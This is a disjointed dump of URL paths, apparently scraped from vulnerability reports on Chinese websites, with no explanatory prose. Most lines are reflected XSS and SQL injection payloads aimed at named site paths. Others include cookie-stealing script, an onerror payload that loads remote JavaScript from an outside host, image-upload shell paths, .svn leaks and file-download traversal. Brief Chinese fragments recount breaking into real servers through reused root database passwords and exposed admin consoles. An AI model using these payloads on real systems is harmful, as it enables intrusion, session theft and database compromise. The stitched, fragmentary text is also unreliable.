/userphoto.php?uid=194711 /newfriends.php?p=4 /sinamall/manager/merchant.upload.asp /sql.php / 80px relative;top:8px relative;top:4px relative;top:8px relative;top:4px /single_info/selectlogin_1.asp /single_info/selectdyy.asp?dyzh=D-1100-041848 /single_info/selectdyy.asp?dyzh=编号 /00/index_admin_01.asp?areaname=%20&areacode=00&page=2 /.svn/entries /.svn/text-base/restserver.php.svn-base /search/thread?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E /blog/ /Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175%09and%09sleep%2828100%29-- act.banggo.com/Ajax/adCodeInfo?adposid=1%09order%09by%098-- /admin/content/docmanage/download.jsp?filePath=/tongzhigonggao/CISSE/fujian.doc /custom/jqgt/GroupNewsList.aspx?GroupId=59 /custom/jqgt/GroupNewsList.aspx?GroupId=59 /jsp/document_downfile.jsp?filePath=C%3A%2FProgram%20Files%2FApache%20Software%20Foundation%2FTomcat%205.5%2Fwebapps%2Fcqrk%2Fcqrk_upload%2Fiteminfo%2F&fileName=%E8%AF%81%E4%B9%A6%E7%99%BB%E8%AE%B0%E6%B3%A8%E5%86%8C%E7%94%B3%E8%AF%B7%E8%A1%A8.doc&saveName=120-2011-12-15-09-34-12-1413.doc /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /popup/popup.js?v=04241601 /get/file/content/old_image/fb64a79258fc6568f1cf28a02fbe84b0?from=page&rnd=16vq30dup&callback=bd__cbs__2hsm6v /get/file/content/old_image/fb64a79258fc6568f1cf28a02fbe84b0?from=page&rnd=16vq30dup /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /get/file/content/old_image/xxxxx /5107/msg/sendmsg.php //resume/resume-list.php?key=test00%bf /info.php /newbbs91/2012/05/31/1338433258596.jpg /newbbs91/2012/05/31/1338433258596.jpg /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png /modify/42/124/4fc6df44153b79013/p4fdc979dc7930c /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png[/img 
/member/UserSettings/的时候), /member/Ajax_Profile /broadcast/add /t91/broadcast/c7/2d/91/c72d9149f543841f5ce0175f1f96cc1e.small.png"onload="alert(document.cookie) /broadcast/add http://www.baidu.com<img/src="1"onerror="alert(/xxxxxx/ http://www.baidu.com<img/src="1"onerror="jQuery.getScript('//xsst.sinaapp.com/m.js /MoviePageAricle2.aspx?aid=46366 www.njulib.cn,去掉www访问后Apache有直接列目录权限,那里面居然可以下载到网站源代码和phpMyAdmin目录……于是轻松看到数据库连接参数,代码中是直接用root帐号连接MySQL的。试了几个该公司承接的其他网站,基本都是用的同一个密码,都可以登录phpMyAdmin。 /survey/plus_surveyresult.asp?classid=173 /News_title.php?keyword=Class-1&article_id=NS1100537 /News_title.php?keyword=Class-1&article_id=NS1100537 /huodong/?sorts=1 /Manage/main.html /project/sample/login/index.jsp / /exploits/18329/ /cgi-bin/hseed/two.pl /static/newadd/img/logo.png/1.php /drawsomething/images/img.gif/1.php /szy/ /filelist/download.jsp?filename=%E5%87%8F%E5%85%8D%E7%A8%8E%E7%94%B3%E8%AF%B7%E5%A4%87%E6%A1%88%E8%A1%A8.doc /video/VideoList.jsp?nav=communion&nav2=six /adduser/ /),下载了介绍文件大概知道了UC广告的流程。但后来一不小心发现这台服务器上还存在UC无线营销平台(地址http://115.238.228.138:8050/console/),这个平台控制着UC浏览器所有的内显广告。 /214/2388/0/f/13140686800.gif/1.php /images/sl_logo.jpg/1.php /files/Sctc/news_detail.jsp?id=12597 /tz/jsp/tz/active2009/index.jsp www.quamnet.com /message /v2.5/js/proj/_message_info.js里可以看到函数相关部分, /,下属CCAT培训和证书查询网站存在大量SQL注入漏洞,后台可上传shell, /certificates/,输入1 /admin/index.asp存在SQL注入,可登录后台构造特殊目录上传Shell /ndvs/ /ndvs/auto_UserPswd.asp?UserName=admin /ndvs/User.asp?UserID=1 /friend/mm_friend/info.php?id=xxx url(http://"\") expression(alert(document.cookie)) /oa/category/index.php?categoryId=165'%20or%20'1'= /commlist/index.php?categoryId=1393'%20or%20% /gq/index.php?nodeId=195'%20or%20'1'='2 /cioexpert/index.php?nodeId=536'%20or%20'1'='2 /news/index.php?categoryId=583'%20or%20'1'='2 /news/index.php?categoryId=1338'%20or%20'1'=% /netdiy/cgfa/index.php?nodeId=526&categoryId=1492'%20or%20'1% /soft/list/category/nodeList.php?categoryId=1406&level=2'%20or% 
/commlist/?page=1&categoryId=1393'%20or%20'1'='2 /news/more.php?name=产业动态&nodeId=2035'%20or%20'1'='2 /news/?page=1&categoryId=1338'%20or%20'1'='2 /search/search_article.php?pid=%22%3E%3Cscript%3Ealert%288977135%29%3B%3C/script%3E&checkemail=0 /categorylist.php?categoryId=1533&name=%22%3E%3Cscript%3Ealert%288966775%29%3B%3C/script%3E /list/list.php?nodeId=59&name=%22%3E%3Cscript%3Ealert%285183621%29%3B%3C/script%3E /list/positionList.php?positionId=25&name=%22%3E%3Cscript%3Ealert%280727859%29%3B%3C/script%3E /yejiedongtai/index.php?name=%22%3E%3Cscript%3Ealert%283923548%29%3B%3C/script%3E /fortunenode/index.php?nodeId=1813&name=%22%3E%3Cscript%3Ealert%282364748%29%3B%3C/script%3E /complexnode/index.php?nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%283107906%29%3B%3C/script%3E /commlist/index.php?categoryId=1393&name=%22%3E%3Cscript%3Ealert%285573514%29%3B%3C/script%3E /news/index.php?categoryId=583&name=%22%3E%3Cscript%3Ealert%283291737%29%3B%3C/script%3E /cionode/index.php?nodeId=232&name=%22%3E%3Cscript%3Ealert%283347723%29%3B%3C/script%3E /jinrigengxin/index.php?nodeId=174&name=%22%3E%3Cscript%3Ealert%284075823%29%3B%3C/script%3E /newsposition/index.php?positionId=101&name=%22%3E%3Cscript%3Ealert%280423207%29%3B%3C/script%3E /news/index.php?categoryId=1338&name=%22%3E%3Cscript%3Ealert%286221176%29%3B%3C/script%3E /mobilenode/index.php?nodeId=477&name=%22%3E%3Cscript%3Ealert%281562061%29%3B%3C/script%3E /6.php?bigCID= /list/index.php?nodeId1=1036&nodeId2=447&nodeId3=371&name=%22%3E%3Cscript%3Ealert%281885420%29%3B%3C/script%3E /list/diy/index.php?nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%283402915%29%3B%3C/script%3E /list/node/index.php?nodeId=1712&name=%22%3E%3Cscript%3Ealert%282924914%29%3B%3C/script%3E /notebook/list/index.php?nodeId1=502&name=%22%3E%3Cscript%3Ealert%286628845%29%3B%3C/script%3E /list/nodelevelandCategory/index.php?nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281206047%29%3B%3C/script%3E&name=商务笔记本 
/list/nodeIdandCategory/index.php?categoryId=%22%3E%3Cscript%3Ealert%286029544%29%3B%3C/script%3E&nodeId=1036&name=资讯 /4.php?bigCID= /list/nodelevelandCategory/index.php?nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285658733%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=%22%3E%3Cscript%3Ealert%283933171%29%3B%3C/script%3E&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /list/nodeIdandCategory/index.php?categoryId=1476&nodeId=1036&name=%22%3E%3Cscript%3Ealert%284112910%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=%22%3E%3Cscript%3Ealert%288228729%29%3B%3C/script%3E&name=评测 /list/category/index.php?categoryId=%22%3E%3Cscript%3Ealert%283631018%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=%22%3E%3Cscript%3Ealert%285351740%29%3B%3C/script%3E&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /list/category/index.php?categoryId=1318&name=%22%3E%3Cscript%3Ealert%283105104%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=1391&name=%22%3E%3Cscript%3Ealert%289518732%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=%22%3E%3Cscript%3Ealert%282614320%29%3B%3C/script%3E&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /oa/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%280044518%29%3B%3C/script%3E /list/nodelevel2/index.php?nodeIdLevel2=%22%3E%3Cscript%3Ealert%284342166%29%3B%3C/script%3E&name=整机 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=%22%3E%3Cscript%3Ealert%287118728%29%3B%3C/script%3E&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /104.php?bigCID= /oa/topic/index.php?nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%283488662%29%3B%3C/script%3E&name=专题 /netdiy/cgfa/index.php?nodeId=526&categoryId=1492&name=%22%3E%3Cscript%3Ealert%287733514%29%3B%3C/script%3E 
/oa/printscroll/list/index.php?typeId=%22%3E%3Cscript%3Ealert%287733514%29%3B%3C/script%3E&categoryId=105&name=一体机 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=%22%3E%3Cscript%3Ealert%283418599%29%3B%3C/script%3E&nodeLevel2Id=267&name=芯片技术 /list/nodelevel2/index.php?nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%283418599%29%3B%3C/script%3E /printer/printer/index.php?categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%288874447%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E&name=芯片技术 /printer/scrollplot/list/index.php?typeId=%22%3E%3Cscript%3Ealert%287235459%29%3B%3C/script%3E&categoryId=104&name=复印机复合机 /oa/topic/index.php?nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E /projector/projectiondisplay/list/index.php?typeId=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E&categoryId=119&name=投影机 /oa/category/index.php?categoryId=165&name=%22%3E%3Cscript%3Ealert%284232933%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=%22%3E%3Cscript%3Ealert%284861999%29%3B%3C/script%3E /netdiy/router/list/index.php?nodeId=525&typeId=%22%3E%3Cscript%3Ealert%280019428%29%3B%3C/script%3E&categoryId=46&name=交换机 /oa/printscroll/list/index.php?typeId=105&categoryId=105&name=%22%3E%3Cscript%3Ealert%280164505%29%3B%3C/script%3E /printer/scrollplot/list/index.php?typeId=104&categoryId=104&name=%22%3E%3Cscript%3Ealert%289127259%29%3B%3C/script%3E /projector/projectiondisplay/list/index.php?typeId=119&categoryId=119&name=%22%3E%3Cscript%3Ealert%281309529%29%3B%3C/script%3E /printer/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%282443590%29%3B%3C/script%3E 
/oa/printscroll/index.php?categoryId=155,156,158,160,116&name=%22%3E%3Cscript%3Ealert%286705186%29%3B%3C/script%3E /netdiy/router/list/index.php?nodeId=525&typeId=46&categoryId=46&name=%22%3E%3Cscript%3Ealert%282176758%29%3B%3C/script%3E /oa/complexlist/index.php?categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%286269462%29%3B%3C/script%3E /projector/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%287313459%29%3B%3C/script%3E /netdiy/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%286832657%29%3B%3C/script%3E /list/node/index.php?nodeId=415&name=%22%3E%3Cscript%3Ealert%289558576%29%3B%3C/script%3E /list/positionList.php?positionId=70&name=%22%3E%3Cscript%3Ealert%288041743%29%3B%3C/script%3E /list/nodelevel2/index.php?nodeId=&name=%22%3E%3Cscript%3Ealert%280511604%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=529&name=%22%3E%3Cscript%3Ealert%286845032%29%3B%3C/script%3E /18.php?bigCID= /list/public/index.php?nodeLevel2Id=263&categoryId=1436&name=%22%3E%3Cscript%3Ealert%284864933%29%3B%3C/script%3E /soft/list/nodeList.php?name=%22%3E%3Cscript%3Ealert%282249685%29%3B%3C/script%3E&nodeId=309 /10.php?bigCID= /list/nodeList.php?name=%22%3E%3Cscript%3Ealert%280181458%29%3B%3C/script%3E&nodeId=315 /list/positionList.php?name=%22%3E%3Cscript%3Ealert%286639160%29%3B%3C/script%3E&positionId=115 /78.php?tip=6&bigCID= /soft/list/category/nodeList.php?categoryId=1406&level=2&nodeId=257&name=%22%3E%3Cscript%3Ealert%286121285%29%3B%3C/script%3E /list/category/nodeList.php?categoryId=1415&level=2&nodeId=257&name=%22%3E%3Cscript%3Ealert%282124874%29%3B%3C/script%3E /list/list.php?nodeId=1801&name=%22%3E%3Cscript%3Ealert%289529156%29%3B%3C/script%3E /54.php?tip=1&bigCID= /48.php?tip=0&bigCID= /77.php?tip=5&bigCID= /61.php?tip=2&bigCID= /76.php?tip=8&bigCID= /170.php?tip=9&bigCID= /list/positionList.php?positionId=7&name=%22%3E%3Cscript%3Ealert%280515268%29%3B%3C/script%3E /55.php?bigCID= /30.php?bigCID= /119.php?bigCID= 
/31.php?tip=1&bigCID= /36.php?tip=5&bigCID= /32.php?tip=2&bigCID= /80.php?tip=1&bigCID= /33.php?tip=3&bigCID= /88.php?tip=1&bigCID= /34.php?tip=4&bigCID= /169.php?tip=2&bigCID= /list_detail.php?cID=44&bigCID= /117.php?tip=1&bigCID= /156.php?tip=4&bigCID= /5.php?bigCID= /155.php?tip=3&bigCID= /158.php?tip=5&bigCID= /165.php?tip=8&bigCID= /105.php?tip=1&bigCID= /top_more.php?cID= /top_more.php?cID=4&cName= /top_more.php?cID=4&cName=笔记本&incN= /list/product/index.php?categoryId=11&name=%22%3E%3Cscript%3Ealert%287297932%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%288501309%29%3B%3C/script%3E /fortunenode/?page=2&nodeId=1813&name=%22%3E%3Cscript%3Ealert%282941973%29%3B%3C/script%3E /fortunenode/?page=1&nodeId=1813&name=%22%3E%3Cscript%3Ealert%282391872%29%3B%3C/script%3E /fortunenode/?page=5&nodeId=1813&name=%22%3E%3Cscript%3Ealert%285508696%29%3B%3C/script%3E /fortunenode/?page=4&nodeId=1813&name=%22%3E%3Cscript%3Ealert%281810968%29%3B%3C/script%3E /fortunenode/?page=3&nodeId=1813&name=%22%3E%3Cscript%3Ealert%281810968%29%3B%3C/script%3E /fortunenode/?page=8&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=7&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=6&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=9&nodeId=1813&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=1&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=2&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=4&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=3&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=8&name=%22%3E%3Cscript%3Ealert%287807484%29%3B%3C/script%3E /yejiedongtai/?page=7&name=%22%3E%3Cscript%3Ealert%282110832%29%3B%3C/script%3E 
/yejiedongtai/?page=6&name=%22%3E%3Cscript%3Ealert%281418433%29%3B%3C/script%3E /yejiedongtai/?page=5&name=%22%3E%3Cscript%3Ealert%282110832%29%3B%3C/script%3E /yejiedongtai/?page=9&name=%22%3E%3Cscript%3Ealert%284855881%29%3B%3C/script%3E /complexnode/?page=1&nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%283676701%29%3B%3C/script%3E /complexnode/?page=2&nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%289900022%29%3B%3C/script%3E /newsposition/index.php?name=%22%3E%3Cscript%3Ealert%281063181%29%3B%3C/script%3E&positionId=504 /commlist/?page=1&categoryId=1393&name=%22%3E%3Cscript%3Ealert%284703398%29%3B%3C/script%3E /commlist/?page=2&categoryId=1393&name=%22%3E%3Cscript%3Ealert%287188139%29%3B%3C/script%3E /commlist/?page=3&categoryId=1393&name=%22%3E%3Cscript%3Ealert%289377102%29%3B%3C/script%3E /commlist/?page=4&categoryId=1393&name=%22%3E%3Cscript%3Ealert%281573803%29%3B%3C/script%3E /commlist/?page=5&categoryId=1393&name=%22%3E%3Cscript%3Ealert%281183085%29%3B%3C/script%3E /commlist/?page=7&categoryId=1393&name=%22%3E%3Cscript%3Ealert%286589693%29%3B%3C/script%3E /commlist/?page=8&categoryId=1393&name=%22%3E%3Cscript%3Ealert%285089784%29%3B%3C/script%3E /commlist/?page=6&categoryId=1393&name=%22%3E%3Cscript%3Ealert%284527067%29%3B%3C/script%3E /commlist/?page=9&categoryId=1393&name=%22%3E%3Cscript%3Ealert%283362557%29%3B%3C/script%3E /news/more.php?name=%22%3E%3Cscript%3Ealert%280561981%29%3B%3C/script%3E&nodeId=2035 /solution/more.php?name=%22%3E%3Cscript%3Ealert%285239895%29%3B%3C/script%3E&nodeId=2045 /news/?page=2&categoryId=583&name=%22%3E%3Cscript%3Ealert%286916568%29%3B%3C/script%3E /news/?page=1&categoryId=583&name=%22%3E%3Cscript%3Ealert%282305454%29%3B%3C/script%3E /news/?page=3&categoryId=583&name=%22%3E%3Cscript%3Ealert%280629255%29%3B%3C/script%3E /news/?page=4&categoryId=583&name=%22%3E%3Cscript%3Ealert%285894503%29%3B%3C/script%3E /news/?page=6&categoryId=583&name=%22%3E%3Cscript%3Ealert%288313014%29%3B%3C/script%3E 
/news/?page=5&categoryId=583&name=%22%3E%3Cscript%3Ealert%284204711%29%3B%3C/script%3E /news/?page=7&categoryId=583&name=%22%3E%3Cscript%3Ealert%280451959%29%3B%3C/script%3E /news/?page=8&categoryId=583&name=%22%3E%3Cscript%3Ealert%286437685%29%3B%3C/script%3E /news/?page=9&categoryId=583&name=%22%3E%3Cscript%3Ealert%284596701%29%3B%3C/script%3E /cionode/?page=1&nodeId=232&name=%22%3E%3Cscript%3Ealert%286676064%29%3B%3C/script%3E /cionode/?page=2&nodeId=232&name=%22%3E%3Cscript%3Ealert%282894541%29%3B%3C/script%3E /cionode/?page=3&nodeId=232&name=%22%3E%3Cscript%3Ealert%288302943%29%3B%3C/script%3E /cionode/?page=4&nodeId=232&name=%22%3E%3Cscript%3Ealert%284614342%29%3B%3C/script%3E /cionode/?page=5&nodeId=232&name=%22%3E%3Cscript%3Ealert%287811052%29%3B%3C/script%3E /cionode/?page=6&nodeId=232&name=%22%3E%3Cscript%3Ealert%286340240%29%3B%3C/script%3E /cionode/?page=7&nodeId=232&name=%22%3E%3Cscript%3Ealert%289447940%29%3B%3C/script%3E /cionode/?page=8&nodeId=232&name=%22%3E%3Cscript%3Ealert%285859438%29%3B%3C/script%3E /cionode/?page=9&nodeId=232&name=%22%3E%3Cscript%3Ealert%288976037%29%3B%3C/script%3E /jinrigengxin/?page=3&nodeId=174&name=%22%3E%3Cscript%3Ealert%286983154%29%3B%3C/script%3E /jinrigengxin/?page=1&nodeId=174&name=%22%3E%3Cscript%3Ealert%289009533%29%3B%3C/script%3E /jinrigengxin/?page=2&nodeId=174&name=%22%3E%3Cscript%3Ealert%281166529%29%3B%3C/script%3E /jinrigengxin/?page=4&nodeId=174&name=%22%3E%3Cscript%3Ealert%288500426%29%3B%3C/script%3E /jinrigengxin/?page=5&nodeId=174&name=%22%3E%3Cscript%3Ealert%282241740%29%3B%3C/script%3E /jinrigengxin/?page=6&nodeId=174&name=%22%3E%3Cscript%3Ealert%282905826%29%3B%3C/script%3E /jinrigengxin/?page=8&nodeId=174&name=%22%3E%3Cscript%3Ealert%280953124%29%3B%3C/script%3E /jinrigengxin/?page=7&nodeId=174&name=%22%3E%3Cscript%3Ealert%288892411%29%3B%3C/script%3E /newsposition/?page=1&positionId=101&name=%22%3E%3Cscript%3Ealert%289937494%29%3B%3C/script%3E 
/jinrigengxin/?page=9&nodeId=174&name=%22%3E%3Cscript%3Ealert%283779686%29%3B%3C/script%3E /newsposition/?page=2&positionId=101&name=%22%3E%3Cscript%3Ealert%286349813%29%3B%3C/script%3E /newsposition/?page=3&positionId=101&name=%22%3E%3Cscript%3Ealert%281261478%29%3B%3C/script%3E /newsposition/?page=6&positionId=101&name=%22%3E%3Cscript%3Ealert%282559542%29%3B%3C/script%3E /newsposition/?page=4&positionId=101&name=%22%3E%3Cscript%3Ealert%282361563%29%3B%3C/script%3E /newsposition/?page=8&positionId=101&name=%22%3E%3Cscript%3Ealert%286668253%29%3B%3C/script%3E /newsposition/?page=5&positionId=101&name=%22%3E%3Cscript%3Ealert%289774952%29%3B%3C/script%3E /newsposition/?page=7&positionId=101&name=%22%3E%3Cscript%3Ealert%289774952%29%3B%3C/script%3E /newsposition/?page=9&positionId=101&name=%22%3E%3Cscript%3Ealert%280394131%29%3B%3C/script%3E /news/?page=1&categoryId=1338&name=%22%3E%3Cscript%3Ealert%285236481%29%3B%3C/script%3E /news/?page=2&categoryId=1338&name=%22%3E%3Cscript%3Ealert%284442836%29%3B%3C/script%3E /news/?page=3&categoryId=1338&name=%22%3E%3Cscript%3Ealert%288651255%29%3B%3C/script%3E /news/?page=4&categoryId=1338&name=%22%3E%3Cscript%3Ealert%281381124%29%3B%3C/script%3E /news/?page=5&categoryId=1338&name=%22%3E%3Cscript%3Ealert%287496090%29%3B%3C/script%3E /newsnode/index.php?nodeId=1832&categoryId=1395&name=%22%3E%3Cscript%3Ealert%281774307%29%3B%3C/script%3E /news/?page=7&categoryId=1338&name=%22%3E%3Cscript%3Ealert%289121892%29%3B%3C/script%3E /news/?page=6&categoryId=1338&name=%22%3E%3Cscript%3Ealert%287650813%29%3B%3C/script%3E /news/?page=8&categoryId=1338&name=%22%3E%3Cscript%3Ealert%283644900%29%3B%3C/script%3E /news/?page=9&categoryId=1338&name=%22%3E%3Cscript%3Ealert%282868877%29%3B%3C/script%3E /mobilenode/?page=1&nodeId=477&name=%22%3E%3Cscript%3Ealert%280030058%29%3B%3C/script%3E /mobilenode/?page=2&nodeId=477&name=%22%3E%3Cscript%3Ealert%289893380%29%3B%3C/script%3E 
/mobilenode/?page=3&nodeId=477&name=%22%3E%3Cscript%3Ealert%283800935%29%3B%3C/script%3E /mobilenode/?page=5&nodeId=477&name=%22%3E%3Cscript%3Ealert%287726808%29%3B%3C/script%3E /mobilenode/?page=4&nodeId=477&name=%22%3E%3Cscript%3Ealert%287726808%29%3B%3C/script%3E /newsposition/index.php?positionId=%22%3E%3Cscript%3Ealert%285145068%29%3B%3C/script%3E&name=精华方案 /mobilenode/?page=6&nodeId=477&name=%22%3E%3Cscript%3Ealert%284665164%29%3B%3C/script%3E /mobilenode/?page=7&nodeId=477&name=%22%3E%3Cscript%3Ealert%285283389%29%3B%3C/script%3E /mobilenode/?page=8&nodeId=477&name=%22%3E%3Cscript%3Ealert%287992778%29%3B%3C/script%3E /mobilenode/?page=9&nodeId=477&name=%22%3E%3Cscript%3Ealert%280150538%29%3B%3C/script%3E /list/diy/nodeIndex.php?nodeId=447&nodeId1=1042&name=%22%3E%3Cscript%3Ealert%285110923%29%3B%3C/script%3E /newsposition/index.php?positionId=344&name=%22%3E%3Cscript%3Ealert%282494034%29%3B%3C/script%3E /list/diy/?page=3&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%286683377%29%3B%3C/script%3E /list/diy/?page=1&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%282469512%29%3B%3C/script%3E /list/diy/?page=2&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%288873350%29%3B%3C/script%3E /list/diy/?page=4&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%282853133%29%3B%3C/script%3E /list/diy/?page=5&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284479224%29%3B%3C/script%3E /list/node/?page=4&nodeId=1712&name=%22%3E%3Cscript%3Ealert%281655791%29%3B%3C/script%3E /list/node/?page=5&nodeId=1712&name=%22%3E%3Cscript%3Ealert%282697893%29%3B%3C/script%3E /list/node/?page=1&nodeId=1712&name=%22%3E%3Cscript%3Ealert%289593894%29%3B%3C/script%3E /list/node/?page=2&nodeId=1712&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E /list/node/?page=3&nodeId=1712&name=%22%3E%3Cscript%3Ealert%287422276%29%3B%3C/script%3E /list/diy/?page=6&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E 
/list/diy/?page=9&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E /list/diy/?page=8&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%289058165%29%3B%3C/script%3E /list/diy/?page=7&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%281265964%29%3B%3C/script%3E /list/nodelevelandCategory/?page=1&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281437223%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=2&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%285633336%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=4&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%288850622%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=6&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%288850622%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=3&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281014195%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=5&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%284207119%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=7&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%286481937%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=8&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%280229790%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=6&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285917291%29%3B%3C/script%3E /list/nodelevelandCategory/?page=9&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281385788%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=4&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287542280%29%3B%3C/script%3E /list/nodelevelandCategory/?page=2&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%282855695%29%3B%3C/script%3E /list/nodelevelandCategory/?page=5&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%288697277%29%3B%3C/script%3E 
/list/nodelevelandCategory/?page=1&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287150363%29%3B%3C/script%3E /list/nodelevelandCategory/?page=3&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287116375%29%3B%3C/script%3E /list/nodelevelandCategory/?page=7&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%288872601%29%3B%3C/script%3E /list/nodelevelandCategory/?page=8&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287716559%29%3B%3C/script%3E /list/nodelevelandCategory/?page=9&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%280077336%29%3B%3C/script%3E /list/category/?page=1&categoryId=%22%3E%3Cscript%3Ealert%289962911%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=2&categoryId=%22%3E%3Cscript%3Ealert%280708936%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=3&categoryId=%22%3E%3Cscript%3Ealert%287956376%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/nodeIdandCategory/?page=1&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%289145460%29%3B%3C/script%3E&name=资讯 /list/category/?page=1&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287128735%29%3B%3C/script%3E /list/category/?page=4&categoryId=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=2&categoryId=1318&name=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E /list/category/?page=9&categoryId=%22%3E%3Cscript%3Ealert%285177022%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=5&categoryId=%22%3E%3Cscript%3Ealert%280584221%29%3B%3C/script%3E&name=上网本·3G笔记本 